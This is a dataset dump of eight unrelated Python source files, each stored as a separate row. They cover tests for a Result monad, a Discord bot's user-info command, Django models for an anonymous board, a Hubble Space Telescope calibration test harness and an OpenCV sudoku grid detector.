id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
115723
|
import pytest
from meiga import Result, Error
@pytest.mark.unit
def test_should_create_a_success_result_with_a_true_bool():
result = Result(success=True)
assert result.is_success
assert result.value is True
@pytest.mark.unit
def test_should_create_a_success_result_with_a_false_bool():
result = Result(success=False)
assert result.is_success
assert result.value is False
@pytest.mark.unit
def test_should_create_a_success_result_with_a_none_value():
result = Result(success=None)
assert result.is_success
assert result.value is None
@pytest.mark.unit
def test_should_create_a_failure_result_with_a_generic_error():
result = Result(failure=Error())
assert result.is_failure
assert isinstance(result.value, Error)
@pytest.mark.unit
def test_should_create_a_failure_result_with_any_error():
class AnyError(Error):
pass
result = Result(failure=AnyError())
assert result.is_failure
assert isinstance(result.value, AnyError)
assert issubclass(result.value.__class__, Error)
@pytest.mark.unit
def test_should_raise_a_type_error_when_result_is_constructed_with_success_and_failure_at_the_same_time():
with pytest.raises(TypeError) as excinfo:
_ = Result(success="Success", failure="Failure")
assert (
"Result is a monad, it cannot be success and failure at the same time."
in str(excinfo.value)
)
@pytest.mark.unit
def test_should_raise_a_type_error_when_result_is_constructed_without_any_success_or_failure_value():
with pytest.raises(TypeError) as excinfo:
_ = Result()
assert "Result is a monad, it must be a success or a failure." in str(
excinfo.value
)
@pytest.mark.unit
def test_should_repr_a_success_result():
result = Result(success=2)
assert "Result[status: success | value: 2]" == result.__repr__()
@pytest.mark.unit
def test_should_repr_a_failure_result():
result = Result(failure=Error())
assert "Result[status: failure | value: Error]" == result.__repr__()
@pytest.mark.unit
def test_should_eq_two_equal_success_result():
result_1 = Result(success=2)
result_2 = Result(success=2)
assert result_1 == result_2
@pytest.mark.unit
def test_should_eq_two_different_success_result():
result_1 = Result(success=2)
result_2 = Result(success=3)
assert result_1 != result_2
@pytest.mark.unit
def test_should_eq_two_equal_failure_result():
result_1 = Result(failure=Error())
result_2 = Result(failure=Error())
assert result_1 == result_2
@pytest.mark.unit
def test_should_eq_two_different_failure_result():
result_1 = Result(failure=Error())
result_2 = Result(failure=Exception())
assert result_1 != result_2
|
115755
|
from .rule import Rule
from abc import ABC, abstractmethod
class CSVRule(Rule):
'''el_id can be either id of a node or of a resource'''
def __init__(self, name_in_csv, el_id):
self.id = el_id
self.name_in_csv = name_in_csv
super().__init__()
def get_name_in_csv(self):
return self.name_in_csv
def get_id(self):
return self.id
@abstractmethod
def check(self, patient):
pass
|
115770
|
import time
from tkinter import *
from collections import deque
user_command_root = Tk()
user_command_root.title("TP3DS User Command")
user_command_root.geometry('350x640')
user_command_root.configure(background='black')
user_command_root.resizable(width=FALSE, height=FALSE)
text_font = ("", "20")
command_window_height_lines = 20
username_width_chars = 18
command_width_chars = 200
text_username = Text(user_command_root, height=command_window_height_lines, width=username_width_chars, background = "black", foreground = "white", font = text_font)
text_username.pack()
text_username.place(x=0, y=0)
text_commands = Text(user_command_root, height=command_window_height_lines, width=command_width_chars, background = "black", foreground = "white", font = text_font)
text_commands.pack()
text_commands.place(x=250, y=0)
command_print_queue = deque()
username_print_queue = deque()
color_print_queue = deque()
def make_tag(line_number, position):
return str(line_number) + "." + str(position)
def replace_arrows(cmd):
return cmd.replace("up", "β").replace("down", "β").replace("left", "β").replace("right", "β")
def print_command_list(command_printer_in, command_length, offset):
chat_username = command_printer_in[0]
command_list = command_printer_in[1]
command_color = command_printer_in[2]
if len(command_list) == 0 or len(chat_username) == 0:
return
user_command = ""
for item in command_list:
user_command += item
user_command = replace_arrows(user_command)
username_print_queue.append(chat_username[:21].capitalize())
if(len(username_print_queue) > command_length - offset):
username_print_queue.popleft()
command_print_queue.append(user_command[:12])
if(len(command_print_queue) > command_length - offset):
command_print_queue.popleft()
color_print_queue.append(command_color)
if(len(color_print_queue) > command_length - offset):
color_print_queue.popleft()
text_commands.delete(1.0, END)
for item in command_print_queue:
text_commands.insert(END, item.upper() + '\n')
text_commands.tag_add("command", "1.0", END)
text_commands.tag_config("command", background="black", foreground="white", justify = LEFT)
text_username.delete(1.0, END)
for index, i in enumerate(username_print_queue):
text_username.insert(END, username_print_queue[index] + "\n")
for index, i in enumerate(color_print_queue):
tag_name = "username" + str(index)
tag_start = make_tag(index+1, 0)
tag_end = make_tag(index+1, len(username_print_queue[index]))
text_username.tag_add(tag_name, tag_start, tag_end)
text_username.tag_config(tag_name, background="black", foreground=color_print_queue[index])
# count = 0
# while 1:
# command_printer_in = []
# command_printer_in.append(str(count))
# command_printer_in.append(['down', 'left', "up", 'right'])
# command_printer_in.append('white')
# print(command_printer_in)
# time.sleep(0.1)
# print_command_list(command_printer_in, 20, 0)
# user_command_root.update()
# count += 1
|
115772
|
from objects.modulebase import ModuleBase
from objects.permissions import PermissionEmbedLinks, PermissionExternalEmojis
from utils.funcs import find_user, _get_last_user_message_timestamp
from datetime import datetime
import discord
STATUS_EMOTES = {
'online': '<:online:427209268240973854>',
'idle': '<:idle:427209268203094017>',
'dnd': '<:dnd:427209268043841537>',
'offline': '<:offline:427209267687194625>',
'invisible': '<:invisible:427209267687194625>'
}
ACTIVITY_MAP = {
discord.ActivityType.unknown: '',
discord.ActivityType.playing: 'Playing: ',
discord.ActivityType.streaming: 'Streaming: ',
discord.ActivityType.listening: 'Listening: ',
discord.ActivityType.watching: 'Watching: ',
discord.ActivityType.custom: '',
}
class Module(ModuleBase):
usage_doc = '{prefix}{aliases} [user]'
short_doc = 'Get information about given user'
name = 'user'
aliases = (name, 'userinfo')
category = 'Discord'
bot_perms = (PermissionEmbedLinks(), )
async def on_call(self, ctx, args, **flags):
if len(args) == 1:
user = ctx.author
else:
user = await find_user(args[1:], ctx.message)
if user is None:
return await ctx.warn('User not found')
e = discord.Embed(
title=str(user),
url=str(user.avatar_url),
colour=discord.Colour.gold()
)
e.set_thumbnail(url=user.avatar_url)
e.add_field(
name='registered', inline=False,
value=f'`{user.created_at.replace(microsecond=0)}` ({(datetime.now() - user.created_at).days} days ago)'
)
if isinstance(user, discord.Member):
# function can return members from different guild
if user.guild == ctx.guild:
e.title += ' (member)'
e.add_field(
name='member since', inline=False,
value=f'`{user.joined_at.replace(microsecond=0)}` ({(datetime.now() - user.joined_at).days} days)'
)
last_msg_ts = _get_last_user_message_timestamp(user.id, ctx.channel.id)
if last_msg_ts != datetime.fromtimestamp(0):
last_msg_ts = last_msg_ts.replace(microsecond=0)
e.add_field(
name='last message sent', inline=False,
value=f'`{last_msg_ts}`'
)
e.add_field(name='top role', value=user.top_role.mention)
e.add_field(name='total roles', value=len(user.roles))
if user.nick is not None:
e.add_field(name='nick', value=user.nick, inline=False)
external_emoji_perm = PermissionExternalEmojis().check(ctx.channel, self.bot.user)
activity = user.activity
if activity is None:
e.add_field(
name='status',
value=(STATUS_EMOTES[str(user.status)] if external_emoji_perm else '') + str(user.status)
)
else:
activity_state = ACTIVITY_MAP.get(activity.type, '')
emoji = ''
# thanks discord.py
if getattr(activity, 'emoji', None):
# activity has emoji
if activity.emoji.id:
# emoji is custom
if self.bot.get_emoji(activity.emoji.id):
# bot has access to emoji
emoji = activity.emoji
else:
# bot has no acces to emoji
emoji = '\N{THINKING FACE}'
else:
# emoji is standard
emoji = activity.emoji
activity_name = f'{emoji} {activity.name if activity.name else ""}'
e.add_field(
name='activity',
value=(STATUS_EMOTES[str(user.status)] if external_emoji_perm else '') + f'{activity_state}{activity_name}'
)
e.add_field(name='robot', value='yes' if user.bot else 'no')
e.set_footer(text=user.id)
await ctx.send(embed=e)
|
115777
|
from django.conf import settings
from django_rq.management.commands.rqworker import Command as C
class Command(C):
"""
Subclass django_rq's built-in rqworker to listen on all configured queues if none
are specified (instead of only the 'default' queue).
"""
def handle(self, *args, **options):
if len(args) < 1:
args = settings.RQ_QUEUES
super().handle(*args, **options)
|
115800
|
import os
from django.conf import settings
from django.db import models
from django.utils import timezone
from datetime import datetime, timedelta
from uuid import uuid4
def get_image_path(instance, filename):
ymd_path = datetime.now().strftime('%Y/%m/%d')
uuid_name = uuid4().hex
return '/'.join(['image_file/', ymd_path, uuid_name])
class Anonymous(models.Model):
writer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True, verbose_name='μμ±μ')
title = models.CharField(max_length=128, verbose_name='μ λͺ©')
content = models.TextField(verbose_name='λ΄μ©')
likes = models.ManyToManyField(settings.AUTH_USER_MODEL, related_name='likes', verbose_name='μΆμ²μ', blank=True)
comments = models.PositiveIntegerField(verbose_name='λκΈμ', default='0')
image_files = models.ImageField(upload_to=get_image_path, null=True, blank=True, verbose_name='μ΄λ―Έμ§νμΌ')
filename = models.CharField(max_length=64, null=True, verbose_name='μ΄λ―Έμ§μ²¨λΆνμΌλͺ
')
registered_date = models.DateTimeField(auto_now_add=True, verbose_name='λ±λ‘μκ°')
def __str__(self):
return self.title
def delete(self, *args, **kargs):
if self.image_files:
os.remove(os.path.join(settings.MEDIA_ROOT, self.image_files.path))
super(Anonymous, self).delete(*args, **kargs)
@property
def like_count(self):
return self.likes.count()
@property
def created_string(self):
time = datetime.now(tz=timezone.utc) - self.registered_date
if time < timedelta(minutes=1):
return 'λ°©κΈ μ '
elif time < timedelta(hours=1):
return str(int(time.seconds / 60)) + 'λΆ μ '
elif time < timedelta(days=1):
return str(int(time.seconds / 3600)) + 'μκ° μ '
elif time < timedelta(days=7):
time = datetime.now(tz=timezone.utc).date() - self.registered_date.date()
return str(time.days) + 'μΌ μ '
else:
return False
class Meta:
db_table = 'μ΅λͺ
κ²μν'
verbose_name = 'μ΅λͺ
κ²μν'
verbose_name_plural = 'μ΅λͺ
κ²μν'
class AnonymousComment(models.Model):
post = models.ForeignKey(Anonymous, on_delete=models.CASCADE, verbose_name='κ²μκΈ')
writer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True, verbose_name='λκΈμμ±μ')
content = models.TextField(verbose_name='λκΈλ΄μ©')
created = models.DateTimeField(auto_now_add=True, verbose_name='μμ±μΌ')
deleted = models.BooleanField(default=False, verbose_name='μμ μ¬λΆ')
reply = models.IntegerField(verbose_name='λ΅κΈμμΉ', default=0)
def __str__(self):
return self.content
@property
def created_string(self):
time = datetime.now(tz=timezone.utc) - self.created
if time < timedelta(minutes=1):
return 'λ°©κΈ μ '
elif time < timedelta(hours=1):
return str(int(time.seconds / 60)) + 'λΆ μ '
elif time < timedelta(days=1):
return str(int(time.seconds / 3600)) + 'μκ° μ '
elif time < timedelta(days=7):
time = datetime.now(tz=timezone.utc).date() - self.created.date()
return str(time.days) + 'μΌ μ '
else:
return False
class Meta:
db_table = 'μ΅λͺ
κ²μν λκΈ'
verbose_name = 'μ΅λͺ
κ²μν λκΈ'
verbose_name_plural = 'μ΅λͺ
κ²μν λκΈ'
|
115823
|
import getpass
import os
import sys
import math
from io import StringIO
import shutil
import datetime
from os.path import splitext
from difflib import unified_diff
import pytest
from astropy.io import fits
from astropy.io.fits import FITSDiff
from astropy.utils.data import conf
import numpy as np
import stwcs
from stsci.tools import fileutil
from ci_watson.artifactory_helpers import get_bigdata, generate_upload_schema
from ci_watson.hst_helpers import download_crds, ref_from_image
# Base classes for actual tests.
# NOTE: Named in a way so pytest will not pick them up here.
@pytest.mark.bigdata
class BaseCal:
prevdir = os.getcwd()
use_ftp_crds = True
timeout = 30 # seconds
tree = 'dev'
# Numpy default for allclose comparison
rtol = 1e-6
atol = 1e-5
# To be defined by instrument
refstr = ''
prevref = ''
input_loc = ''
ref_loc = ''
ignore_keywords = []
# To be defined by individual test
subdir = ''
@pytest.fixture(autouse=True)
def setup_class(self, tmpdir, envopt, pytestconfig):
"""
Run test in own dir so we can keep results separate from
other tests.
"""
if not tmpdir.ensure(self.subdir, dir=True):
p = tmpdir.mkdir(self.subdir).strpath
else:
p = tmpdir.join(self.subdir).strpath
os.chdir(p)
# NOTE: This could be explicitly controlled using pytest fixture
# but too many ways to do the same thing would be confusing.
# Refine this logic if using pytest fixture.
# HSTCAL cannot open remote CRDS on FTP but central storage is okay.
# So use central storage if available to avoid FTP.
if self.prevref is None or self.prevref.startswith(('ftp', 'http')):
os.environ[self.refstr] = p + os.sep
self.use_ftp_crds = True
# Turn off Astrometry updates
os.environ['ASTROMETRY_STEP_CONTROL'] = 'OFF'
# This controls astropy.io.fits timeout
conf.remote_timeout = self.timeout
# Update tree to point to correct environment
self.tree = envopt
# Collect pytest configuration values specified in setup.cfg or pytest.ini
self.inputs_root = pytestconfig.getini('inputs_root')[0]
self.results_root = pytestconfig.getini('results_root')[0]
def teardown_class(self):
"""Reset path and variables."""
conf.reset('remote_timeout')
os.chdir(self.prevdir)
if self.use_ftp_crds and self.prevref is not None:
os.environ[self.refstr] = self.prevref
def get_data(self, *args):
"""
Download `filename` into working directory using
`get_bigdata`. This will then return the full path to
the local copy of the file.
"""
local_file = get_bigdata(self.inputs_root, self.tree, self.input_loc, *args)
return local_file
def get_input_file(self, *args, refsep='$'):
"""
Download or copy input file (e.g., RAW) into the working directory.
The associated CRDS reference files in ``refstr`` are also
downloaded, if necessary.
"""
filename = self.get_data(*args)
ref_files = ref_from_image(filename, ['IDCTAB', 'OFFTAB', 'NPOLFILE', 'D2IMFILE', 'DGEOFILE'])
print("Looking for REF_FILES: {}".format(ref_files))
for ref_file in ref_files:
if ref_file.strip() == '':
continue
if refsep not in ref_file: # Local file
refname = self.get_data('customRef', ref_file)
else: # Download from FTP, if applicable
refname = os.path.join(ref_file)
if self.use_ftp_crds:
download_crds(refname, self.timeout)
return filename
def compare_outputs(self, outputs, raise_error=True):
"""
Compare output with "truth" using appropriate
diff routine; namely,
``fitsdiff`` for FITS file comparisons
``unified_diff`` for ASCII products.
Parameters
----------
outputs : list of tuple
A list of tuples, each containing filename (without path)
of CALXXX output and truth, in that order.
raise_error : bool
Raise ``AssertionError`` if difference is found.
Returns
-------
report : str
Report from ``fitsdiff``.
This is part of error message if ``raise_error=True``.
"""
all_okay = True
creature_report = ''
# Create instructions for uploading results to artifactory for use
# as new comparison/truth files
testpath, testname = os.path.split(os.path.abspath(os.curdir))
# organize results by day test was run...could replace with git-hash
whoami = getpass.getuser() or 'nobody'
dt = datetime.datetime.now().strftime("%d%b%YT")
ttime = datetime.datetime.now().strftime("%H_%M_%S")
user_tag = 'NOT_CI_{}_{}'.format(whoami, ttime)
build_tag = os.environ.get('BUILD_TAG', user_tag)
build_suffix = os.environ.get('BUILD_MATRIX_SUFFIX', 'standalone')
testdir = "{}_{}_{}".format(testname, build_tag, build_suffix)
tree = os.path.join(self.results_root, self.input_loc,
dt, testdir) + os.sep
updated_outputs = []
for actual, desired in outputs:
# Get "truth" image
s = self.get_data('truth', desired)
if s is not None:
desired = s
if actual.endswith('fits'):
# Working with FITS files...
fdiff = FITSDiff(actual, desired, rtol=self.rtol, atol=self.atol,
ignore_keywords=self.ignore_keywords)
creature_report += fdiff.report()
if not fdiff.identical:
# Only keep track of failed results which need to
# be used to replace the truth files (if OK).
updated_outputs.append((actual, desired))
if not fdiff.identical and all_okay:
all_okay = False
else:
# Try ASCII-based diff
with open(actual) as afile:
actual_lines = afile.readlines()
with open(desired) as dfile:
desired_lines = dfile.readlines()
udiff = unified_diff(actual_lines, desired_lines,
fromfile=actual, tofile=desired)
old_stdout = sys.stdout
udiffIO = StringIO()
sys.stdout = udiffIO
sys.stdout.writelines(udiff)
sys.stdout = old_stdout
udiff_report = udiffIO.getvalue()
creature_report += udiff_report
if len(udiff_report) > 2 and all_okay:
all_okay = False
if len(udiff_report) > 2:
# Only keep track of failed results which need to
# be used to replace the truth files (if OK).
updated_outputs.append((actual, desired))
if not all_okay:
# Write out JSON file to enable retention of different results
new_truths = [os.path.abspath(i[1]) for i in updated_outputs]
for files in updated_outputs:
print("Renaming {} as new 'truth' file: {}".format(
files[0], files[1]))
shutil.move(files[0], files[1])
log_pattern = [os.path.join(os.path.dirname(x), '*.log') for x in new_truths]
generate_upload_schema(pattern=new_truths + log_pattern,
testname=testname,
target= tree)
if not all_okay and raise_error:
raise AssertionError(os.linesep + creature_report)
return creature_report
class BaseACS(BaseCal):
refstr = 'jref'
prevref = os.environ.get(refstr)
input_loc = 'acs'
ref_loc = 'acs'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
class BaseACSHRC(BaseACS):
input_loc = 'acs/hrc'
ref_loc = 'acs/hrc/ref'
class BaseACSWFC(BaseACS):
input_loc = 'acs/wfc'
ref_loc = 'acs/wfc/ref'
class BaseWFC3(BaseCal):
refstr = 'iref'
input_loc = 'wfc3'
ref_loc = 'wfc3/ref'
prevref = os.environ.get(refstr)
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
class BaseSTIS(BaseCal):
refstr = 'oref'
prevref = os.environ.get(refstr)
input_loc = 'stis'
ref_loc = 'stis/ref'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
class BaseWFPC2(BaseCal):
refstr = 'uref'
prevref = os.environ.get(refstr)
input_loc = 'wfpc2'
ref_loc = 'wfpc2/ref'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
def centroid_compare(centroid):
return centroid[1]
class BaseUnit(BaseCal):
buff = 0
refstr = 'jref'
prevref = os.environ.get(refstr)
input_loc = 'acs'
ref_loc = 'acs'
ignore_keywords = ['origin', 'filename', 'date', 'iraf-tlm', 'fitsdate',
'upwtim', 'wcscdate', 'upwcsver', 'pywcsver',
'history', 'prod_ver', 'rulefile']
atol = 1.0e-5
def bound_image(self, image):
"""
Compute region where image is non-zero
"""
coords = np.nonzero(image)
ymin = coords[0].min()
ymax = coords[0].max()
xmin = coords[1].min()
xmax = coords[1].max()
return (ymin, ymax, xmin, xmax)
def centroid(self, image, size, center):
"""
Compute the centroid of a rectangular area
"""
ylo = int(center[0]) - size // 2
yhi = min(ylo + size, image.shape[0])
xlo = int(center[1]) - size // 2
xhi = min(xlo + size, image.shape[1])
center = [0.0, 0.0, 0.0]
for y in range(ylo, yhi):
for x in range(xlo, xhi):
center[0] += y * image[y,x]
center[1] += x * image[y,x]
center[2] += image[y,x]
if center[2] == 0.0: return None
center[0] /= center[2]
center[1] /= center[2]
return center
def centroid_close(self, list_of_centroids, size, point):
"""
Find if any centroid is close to a point
"""
for i in range(len(list_of_centroids)-1, -1, -1):
if (abs(list_of_centroids[i][0] - point[0]) < size / 2 and
abs(list_of_centroids[i][1] - point[1]) < size / 2):
return 1
return 0
def centroid_distances(self, image1, image2, amp, size):
"""
Compute a list of centroids and the distances between them in two images
"""
distances = []
list_of_centroids, lst_pts = self.centroid_list(image2, amp, size)
for center2, pt in zip(list_of_centroids, lst_pts):
center1 = self.centroid(image1, size, pt)
if center1 is None: continue
disty = center2[0] - center1[0]
distx = center2[1] - center1[1]
dist = math.sqrt(disty * disty + distx * distx)
dflux = abs(center2[2] - center1[2])
distances.append([dist, dflux, center1, center2])
distances.sort(key=centroid_compare)
return distances
def centroid_list(self, image, amp, size):
"""
Find the next centroid
"""
list_of_centroids = []
list_of_points = []
points = np.transpose(np.nonzero(image > amp))
for point in points:
if not self.centroid_close(list_of_centroids, size, point):
center = self.centroid(image, size, point)
list_of_centroids.append(center)
list_of_points.append(point)
return list_of_centroids, list_of_points
def centroid_statistics(self, title, fname, image1, image2, amp, size):
"""
write centroid statistics to compare differences btw two images
"""
stats = ("minimum", "median", "maximum")
images = (None, None, image1, image2)
im_type = ("", "", "test", "reference")
diff = []
distances = self.centroid_distances(image1, image2, amp, size)
indexes = (0, len(distances)//2, len(distances)-1)
fd = open(fname, 'w')
fd.write("*** %s ***\n" % title)
if len(distances) == 0:
diff = [0.0, 0.0, 0.0]
fd.write("No matches!!\n")
elif len(distances) == 1:
diff = [distances[0][0], distances[0][0], distances[0][0]]
fd.write("1 match\n")
fd.write("distance = %f flux difference = %f\n" % (distances[0][0], distances[0][1]))
for j in range(2, 4):
ylo = int(distances[0][j][0]) - (1+self.buff)
yhi = int(distances[0][j][0]) + (2+self.buff)
xlo = int(distances[0][j][1]) - (1+self.buff)
xhi = int(distances[0][j][1]) + (2+self.buff)
subimage = images[j][ylo:yhi,xlo:xhi]
fd.write("\n%s image centroid = (%f,%f) image flux = %f\n" %
(im_type[j], distances[0][j][0], distances[0][j][1], distances[0][j][2]))
fd.write(str(subimage) + "\n")
else:
fd.write("%d matches\n" % len(distances))
for k in range(0,3):
i = indexes[k]
diff.append(distances[i][0])
fd.write("\n%s distance = %f flux difference = %f\n" % (stats[k], distances[i][0], distances[i][1]))
for j in range(2, 4):
ylo = int(distances[i][j][0]) - (1+self.buff)
yhi = int(distances[i][j][0]) + (2+self.buff)
xlo = int(distances[i][j][1]) - (1+self.buff)
xhi = int(distances[i][j][1]) + (2+self.buff)
subimage = images[j][ylo:yhi,xlo:xhi]
fd.write("\n%s %s image centroid = (%f,%f) image flux = %f\n" %
(stats[k], im_type[j], distances[i][j][0], distances[i][j][1], distances[i][j][2]))
fd.write(str(subimage) + "\n")
fd.close()
return tuple(diff)
def make_point_image(self, input_image, point, value):
"""
Create an image with a single point set
"""
output_image = np.zeros(input_image.shape, dtype=input_image.dtype)
output_image[point] = value
return output_image
def make_grid_image(self, input_image, spacing, value):
"""
Create an image with points on a grid set
"""
output_image = np.zeros(input_image.shape, dtype=input_image.dtype)
shape = output_image.shape
for y in range(spacing//2, shape[0], spacing):
for x in range(spacing//2, shape[1], spacing):
output_image[y,x] = value
return output_image
def print_wcs(self, title, wcs):
"""
Print the wcs header cards
"""
print("=== %s ===" % title)
print(wcs.to_header_string())
def read_image(self, filename):
"""
Read the image from a fits file
"""
hdu = fits.open(filename)
image = hdu[1].data
hdu.close()
return image
def read_wcs(self, filename):
"""
Read the wcs of a fits file
"""
hdu = fits.open(filename)
wcs = stwcs.wcsutil.HSTWCS(hdu, 1)
hdu.close()
return wcs
def write_wcs(self, hdu, image_wcs):
"""
Update header with WCS keywords
"""
hdu.header['ORIENTAT'] = image_wcs.orientat
hdu.header['CD1_1'] = image_wcs.wcs.cd[0][0]
hdu.header['CD1_2'] = image_wcs.wcs.cd[0][1]
hdu.header['CD2_1'] = image_wcs.wcs.cd[1][0]
hdu.header['CD2_2'] = image_wcs.wcs.cd[1][1]
hdu.header['CRVAL1'] = image_wcs.wcs.crval[0]
hdu.header['CRVAL2'] = image_wcs.wcs.crval[1]
hdu.header['CRPIX1'] = image_wcs.wcs.crpix[0]
hdu.header['CRPIX2'] = image_wcs.wcs.crpix[1]
hdu.header['CTYPE1'] = image_wcs.wcs.ctype[0]
hdu.header['CTYPE2'] = image_wcs.wcs.ctype[1]
hdu.header['VAFACTOR'] = 1.0
def write_image(self, filename, wcs, *args):
"""
Read the image from a fits file
"""
extarray = ['SCI', 'WHT', 'CTX']
pimg = fits.HDUList()
phdu = fits.PrimaryHDU()
phdu.header['NDRIZIM'] = 1
phdu.header['ROOTNAME'] = filename
pimg.append(phdu)
for img in args:
# Create a MEF file with the specified extname
extn = extarray.pop(0)
extname = fileutil.parseExtn(extn)
ehdu = fits.ImageHDU(data=img)
ehdu.header['EXTNAME'] = extname[0]
ehdu.header['EXTVER'] = extname[1]
self.write_wcs(ehdu, wcs)
pimg.append(ehdu)
pimg.writeto(filename)
del pimg
def add_suffix(fname, suffix, range=None):
"""Add suffix to file name
Parameters
----------
fname: str
The file name to add the suffix to
suffix: str
The suffix to add_suffix
range: range
If specified, the set of indexes will be added to the
outputs.
Returns
-------
fname, fname_with_suffix
2-tuple of the original file name and name with suffix.
If `range` is defined, `fname_with_suffix` will be a list.
"""
fname_root, fname_ext = splitext(fname)
if range is None:
with_suffix = ''.join([
fname_root,
'_',
suffix,
fname_ext
])
else:
with_suffix = []
for idx in range:
with_suffix.append(''.join([
fname_root,
'_',
str(idx),
'_',
suffix,
fname_ext
]))
return fname, with_suffix
|
115825
|
import cv2
from settings import *
from src.solving_objects.MyHoughLines import *
from src.solving_objects.MyHoughPLines import *
def line_intersection(my_line1, my_line2):
line1 = [[my_line1[0], my_line1[1]], [my_line1[2], my_line1[3]]]
line2 = [[my_line2[0], my_line2[1]], [my_line2[2], my_line2[3]]]
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
return [int(x), int(y)]
def look_for_intersections_hough(lines):
hor_up = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
hor_down = (0, 0, 0, 0) # x1,y1,x2,y2
ver_left = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
ver_right = (0, 0, 0, 0) # x1,y1,x2,y2
for line in [line for line in lines if not line.isMerged]:
lim = line.get_limits()
if line.theta < np.pi / 4: # Ligne Verticale
if lim[0] + lim[2] < ver_left[0] + ver_left[2]:
ver_left = lim
elif lim[0] + lim[2] > ver_right[0] + ver_right[2]:
ver_right = lim
else:
if lim[1] + lim[3] < hor_up[1] + hor_up[3]:
hor_up = lim
elif lim[1] + lim[3] > hor_down[1] + hor_down[3]:
hor_down = lim
# raw_limits_lines = [hor_up, hor_down, ver_left, ver_right]
grid_limits = list()
grid_limits.append(line_intersection(hor_up, ver_left))
grid_limits.append(line_intersection(hor_up, ver_right))
grid_limits.append(line_intersection(hor_down, ver_right))
grid_limits.append(line_intersection(hor_down, ver_left))
return grid_limits
def find_corners(contour):
top_left = [10000, 10000]
top_right = [0, 10000]
bottom_right = [0, 0]
bottom_left = [10000, 0]
# contour_x = sorted(contour,key = lambda c:c[0][0])
# contour_y = sorted(contour,key = lambda c:c[0][1])
mean_x = np.mean(contour[:, :, 0])
mean_y = np.mean(contour[:, :, 1])
for j in range(len(contour)):
x, y = contour[j][0]
if x > mean_x: # On right
if y > mean_y: # On bottom
bottom_right = [x, y]
else:
top_right = [x, y]
else:
if y > mean_y: # On bottom
bottom_left = [x, y]
else:
top_left = [x, y]
return [top_left, top_right, bottom_right, bottom_left]
def get_hough_transform(img, edges, display=False):
my_lines = []
img_after_merge = img.copy()
lines_raw = cv2.HoughLines(edges, 1, np.pi / 180, thresh_hough)
for line in lines_raw:
my_lines.append(MyHoughLines(line))
if display:
for line in my_lines:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)
merge_lines(my_lines)
grid_limits = look_for_intersections_hough(my_lines)
if display:
for line in [line for line in my_lines if not line.isMerged]:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img_after_merge, (x1, y1), (x2, y2), (255, 0, 0), 2)
for point in grid_limits:
x, y = point
cv2.circle(img_after_merge, (x, y), 10, (255, 0, 0), 3)
if not display:
return grid_limits
else:
return grid_limits, img, img_after_merge
class GridDetector:
def __init__(self, display=False):
self.__display = display
def extract_grids(self, frame):
# Get a threshed image which emphasize lines
threshed_img = self.thresh_img(frame)
# Look for grids corners
grids_corners_list = self.look_for_grids_corners(threshed_img)
# Use grids corners to unwrap img !
unwraped_grid_list, transfo_matrix = self.unwrap_grids(frame, grids_corners_list)
return unwraped_grid_list, grids_corners_list, transfo_matrix
@staticmethod
def thresh_img(frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray_enhance = (gray - gray.min()) * int(255 / (gray.max() - gray.min()))
blurred = cv2.GaussianBlur(gray_enhance, (5, 5), 0)
thresh = cv2.adaptiveThreshold(blurred, 255,
cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,
block_size_big, mean_sub_big)
thresh_not = cv2.bitwise_not(thresh)
kernel_close = np.ones((5, 5), np.uint8)
closing = cv2.morphologyEx(thresh_not, cv2.MORPH_CLOSE, kernel_close) # Delete space between line
dilate = cv2.morphologyEx(closing, cv2.MORPH_DILATE, kernel_close) # Delete space between line
return dilate
@staticmethod
def unwrap_grids(frame, points_grids):
undistorted_grids = []
transfo_matrix_list = []
for points_grid in points_grids:
final_pts = np.array(
[[0, 0], [target_w_grid - 1, 0],
[target_w_grid - 1, target_h_grid - 1], [0, target_h_grid - 1]],
dtype=np.float32)
transfo_mat = cv2.getPerspectiveTransform(points_grid, final_pts)
undistorted_grids.append(cv2.warpPerspective(frame, transfo_mat, (target_w_grid, target_h_grid)))
transfo_matrix_list.append(np.linalg.inv(transfo_mat))
return undistorted_grids, transfo_matrix_list
@staticmethod
def look_for_grids_corners(img_lines):
contours, _ = cv2.findContours(img_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
best_contours = []
contours = sorted(contours, key=cv2.contourArea, reverse=True)
biggest_area = cv2.contourArea(contours[0])
for cnt in contours:
area = cv2.contourArea(cnt)
if area < smallest_area_allow:
break
if area > biggest_area / ratio_lim:
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, approx_poly_coef * peri, True)
if len(approx) == 4:
best_contours.append(approx)
corners = []
for best_contour in best_contours:
corners.append(find_corners(best_contour))
return np.array(corners, dtype=np.float32)
if __name__ == '__main__':
# im_path = "dataset_test/021.jpg"
im_path = "images_test/sudoku.jpg"
# im_path = "tmp/030.jpg"
# im_path = "images_test/imagedouble.jpg"
# im_path = "images_test/izi_distord.jpg"
im = cv2.imread(im_path)
cv2.imshow("im", im)
detector = GridDetector()
